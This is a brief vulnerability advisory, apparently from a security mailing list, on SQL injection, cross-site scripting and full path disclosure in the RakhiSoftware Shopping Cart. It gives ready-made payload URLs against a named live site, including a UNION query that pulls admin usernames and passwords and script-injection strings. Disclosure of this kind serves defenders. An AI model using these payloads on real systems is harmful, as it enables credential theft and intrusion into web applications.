Application:  RakhiSoftware Shopping Cart

Vendor Name: RakhiSoftware

Vendors Url:  http://willscript.com/

Bug Type:     RakhiSoftware Shopping Cart (SQL,XSS,FPD) Multiple
Vulnerabilities

 

SQL category_id

http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%20
1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21%20from%20admin--&subcategory_id=1

 

XSS category_id, subcategory_id

http://willscript.com/rjbike_new/product.php?category_id=>'><script>alert(19
49308870);</script>&subcategory_id=1

http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>'
><script>alert(1949308870);</script>

 

Full Path Disclosure on every page

Set Cookie: PHPSESSID='

 

Credits:

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

 

 

Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
 <http://www.astalavista.com/> www.astalavista.com
 <http://www.astalavista.net/> www.astalavista.net